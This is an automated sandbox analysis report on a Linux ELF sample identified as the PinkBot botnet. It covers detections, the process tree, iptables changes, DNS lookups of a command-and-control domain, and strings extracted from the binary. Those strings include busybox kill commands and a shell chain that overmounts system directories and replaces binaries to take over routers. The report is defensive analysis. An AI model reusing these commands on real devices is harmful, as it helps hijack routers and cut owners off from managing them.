Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
file.elf

Overview

General Information

Sample name:file.elf
Analysis ID:1587490
MD5:5ae1fec20c2f720269c2dc94732187e8
SHA1:aff86a5d4a620141a54ad0664e6f9182475ee036
SHA256:41f7ed67877a3d6805d60ad5ea91816f2092012fa316f9fbf1b8fbb953fbada5
Tags:elfPinksbuser-Bitsight
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Executes the "iptables" command to insert, remove and/or manipulate rules
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sleeps for long times indicative of sandbox evasion
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1587490
Start date and time:2025-01-10 13:04:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:file.elf
Detection:MAL
Classification:mal72.troj.linELF@0/18@4/0
  • VT rate limit hit for: cnc.pinklander.com
Command:/tmp/file.elf
PID:5514
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • file.elf (PID: 5514, Parent: 5436, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/file.elf
    • file.elf New Fork (PID: 5516, Parent: 5514)
      • file.elf New Fork (PID: 5518, Parent: 5516)
      • file.elf New Fork (PID: 5522, Parent: 5516)
      • sh (PID: 5522, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE"
        • sh New Fork (PID: 5528, Parent: 5522)
        • iptables (PID: 5528, Parent: 5522, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE
      • file.elf New Fork (PID: 5534, Parent: 5516)
      • sh (PID: 5534, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE"
        • sh New Fork (PID: 5536, Parent: 5534)
        • iptables (PID: 5536, Parent: 5534, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE
      • file.elf New Fork (PID: 5537, Parent: 5516)
        • file.elf New Fork (PID: 5543, Parent: 5537)
        • file.elf New Fork (PID: 5545, Parent: 5537)
        • sh (PID: 5545, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5550, Parent: 5545)
          • iptables (PID: 5550, Parent: 5545, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5565, Parent: 5537)
        • sh (PID: 5565, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5567, Parent: 5565)
          • iptables (PID: 5567, Parent: 5565, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5596, Parent: 5537)
        • sh (PID: 5596, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5598, Parent: 5596)
          • iptables (PID: 5598, Parent: 5596, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5608, Parent: 5537)
        • sh (PID: 5608, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5610, Parent: 5608)
          • iptables (PID: 5610, Parent: 5608, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5628, Parent: 5537)
        • sh (PID: 5628, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5630, Parent: 5628)
          • iptables (PID: 5630, Parent: 5628, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5638, Parent: 5537)
        • sh (PID: 5638, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5640, Parent: 5638)
          • iptables (PID: 5640, Parent: 5638, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5647, Parent: 5537)
        • sh (PID: 5647, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5653, Parent: 5647)
          • iptables (PID: 5653, Parent: 5647, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5663, Parent: 5537)
        • sh (PID: 5663, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5665, Parent: 5663)
          • iptables (PID: 5665, Parent: 5663, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
      • file.elf New Fork (PID: 5538, Parent: 5516)
        • file.elf New Fork (PID: 5617, Parent: 5538)
          • file.elf New Fork (PID: 5619, Parent: 5617)
          • sh (PID: 5619, Parent: 5617, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
            • sh New Fork (PID: 5621, Parent: 5619)
            • iptables (PID: 5621, Parent: 5619, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L INPUT
          • file.elf New Fork (PID: 5622, Parent: 5617)
          • sh (PID: 5622, Parent: 5617, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT"
            • sh New Fork (PID: 5624, Parent: 5622)
            • iptables (PID: 5624, Parent: 5622, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT
        • file.elf New Fork (PID: 5670, Parent: 5538)
          • file.elf New Fork (PID: 5672, Parent: 5670)
          • sh (PID: 5672, Parent: 5670, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
            • sh New Fork (PID: 5674, Parent: 5672)
            • iptables (PID: 5674, Parent: 5672, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L INPUT
      • file.elf New Fork (PID: 5541, Parent: 5516)
  • cleanup
No yara matches
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:04:49.263621+010020343171Domain Observed Used for C2 Detected192.168.2.14344848.8.8.853UDP
2025-01-10T13:04:50.270265+010020343171Domain Observed Used for C2 Detected192.168.2.14469948.8.8.853UDP
2025-01-10T13:04:52.617273+010020343171Domain Observed Used for C2 Detected192.168.2.14500588.8.8.853UDP
2025-01-10T13:04:53.618665+010020343171Domain Observed Used for C2 Detected192.168.2.14534628.8.8.853UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:04:56.354704+010020181411A Network Trojan was detected13.251.16.15080192.168.2.1457484TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:04:56.354704+010020377711A Network Trojan was detected13.251.16.15080192.168.2.1457484TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: file.elfAvira: detected
Source: file.elfReversingLabs: Detection: 65%
Source: file.elfVirustotal: Detection: 61%Perma Link

Networking

barindex
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.14:34484 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.14:46994 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.14:50058 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.14:53462 -> 8.8.8.8:53
Source: /bin/sh (PID: 5528)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5536)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5624)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 1088
Source: global trafficTCP traffic: 192.168.2.14:53448 -> 13.251.16.150:1088
Source: /bin/sh (PID: 5528)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5536)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5550)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5567)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5598)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5610)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5630)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5640)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5653)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5665)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5621)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior
Source: /bin/sh (PID: 5624)Iptables executable: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: /bin/sh (PID: 5674)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior
Source: /tmp/file.elf (PID: 5516)Socket: 127.0.0.1:61889Jump to behavior
Source: /tmp/file.elf (PID: 5537)Socket: 127.0.0.1:61869Jump to behavior
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.14:57484
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.14:57484
Source: global trafficHTTP traffic detected: GET /d/index.html HTTP/1.1Host: 13.251.16.150:1088Connection: Keep-AliveAccept: */*Accept-Language: zh-cn,zh;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 LBBROWSERAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 13.251.16.150Connection: Keep-AliveAccept: */*Accept-Language: zh-cn,zh;q=0.5User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.7.0.18838Accept-Encoding: gzip
Source: global trafficDNS traffic detected: DNS query: cnc.pinklander.com
Source: file.elfString found in binary or memory: http://%s:%d/d/index.html
Source: file.elfString found in binary or memory: http://%s:%d/d/index.htmlcnc.pinklander.com/tmp/pink/cache_finder_page_webhttp://%s//tmp/pink/fc_ip%
Source: Initial sampleString containing 'busybox' found: busybox killall -9 httpd
Source: Initial sampleString containing 'busybox' found: busybox killall -9 tr69c
Source: Initial sampleString containing 'busybox' found: busybox killall -9 lld2d
Source: Initial sampleString containing 'busybox' found: busybox killall -9 pptp
Source: Initial sampleString containing 'busybox' found: busybox killall -9 openl2tpd
Source: Initial sampleString containing 'busybox' found: rm -rf /tmp/mybin;rm -rf /tmp/mytool;mkdir /tmp/mybin;mkdir /tmp/mytool;cp -rf /bin/* /tmp/mybin/;cp /bin/busybox /tmp/mytool/mount;cp /bin/busybox /tmp/mytool/cp;chmod 777 /tmp/mytool/*;rm -rf /tmp/mybin/tr69c;rm -rf /tmp/mybin/pptp;rm -rf /tmp/mybin/openl2tpd;rm -rf /tmp/mybin/lld2d;rm -rf /tmp/mybin/sntp;rm -rf /tmp/mybin/httpd;mount -t tmpfs -o size=40m tmpfs /bin;/tmp/mytool/cp -rf /tmp/mybin/* /bin/;rm -rf /tmp/mybin;rm -rf /tmp/mytool
Source: Initial sampleString containing 'busybox' found: rm -rf /tmp/mybin;rm -rf /tmp/mytool;mkdir /tmp/mybin;mkdir /tmp/mytool;cp -rf /bin/* /tmp/mybin/;cp /bin/busybox /tmp/mytool/mount;cp /bin/busybox /tmp/mytool/cp;chmod 777 /tmp/mytool/*;rm -rf /tmp/mybin/tr69c;rm -rf /tmp/mybin/pptp;rm -rf /tmp/mybin/openl2tpd;rm -rf /tmp/mybin/lld2d;rm -rf /tmp/mybin/sntp;rm -rf /tmp/mybin/httpd;mount -t tmpfs -o size=40m tmpfs /bin;/tmp/mytool/cp -rf /tmp/mybin/* /bin/;rm -rf /tmp/mybin/*;cp -rf /usr/bin/* /tmp/mybin/;mount -t tmpfs -o size=1m tmpfs /usr/bin;cp -rf /tmp/mybin/* /usr/bin/;rm -rf /tmp/mybin;mount -t tmpfs -o size=1 tmpfs /sbin;mv /usr/bin/wget /usr/bin/init;cp /usr/bin/init /usr/bin/ifconfig;rm -rf /usr/bin/killall;
Source: Initial sampleString containing 'busybox' found: busybox killall -9 sntp
Source: Initial sampleString containing 'busybox' found: :%04X /proc/net/tcp/proc/net/udp/proc//proc/%s/fd/proc/%s/fd/%s%dfilterINPUTTCPDROPUDPACCEPTupnptelnetdigdmptdr/bin/mdm getvalues %s.NameTR069VOIPVOICESIPINTERNETIPTV/bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnection./bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnectionInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnection.%dWANPPPConnection./bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANPPPConnectionInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANPPPConnection.%d/bin/mdm getnames InternetGatewayDevice.WANDevice.1InternetGatewayDevice.WANDevice.1.WANConnectionDevice/bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDeviceInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d/tmp/kt/bin/mdm delobject InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d/bin/mdm setvalues InternetGatewayDevice.X_CU_Function.Web.UserName "%s"/bin/mdm setvalues InternetGatewa
Source: classification engineClassification label: mal72.troj.linELF@0/18@4/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5528)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5536)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5624)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3760/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3761/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1583/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/2672/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1577/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1593/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/240/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3094/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/242/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3406/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/244/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1589/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/245/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3402/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/247/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3762/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/801/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3763/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/806/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/807/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/928/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3420/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/131/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/252/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/132/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/253/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/254/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/255/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/135/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/256/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1599/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/257/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/378/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/258/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/3412/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/259/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/30/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/35/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/1371/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/260/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/261/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5516)File opened: /proc/262/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5522)Shell command executed: /bin/sh -c "/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE"Jump to behavior
Source: /tmp/file.elf (PID: 5534)Shell command executed: /bin/sh -c "/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE"Jump to behavior
Source: /tmp/file.elf (PID: 5545)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5565)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5596)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5608)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5628)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5638)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5647)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5663)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5619)Shell command executed: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5622)Shell command executed: /bin/sh -c "/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT"Jump to behavior
Source: /tmp/file.elf (PID: 5672)Shell command executed: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"Jump to behavior
Source: /bin/sh (PID: 5528)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5536)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5550)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5567)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5598)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5610)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5630)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5640)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
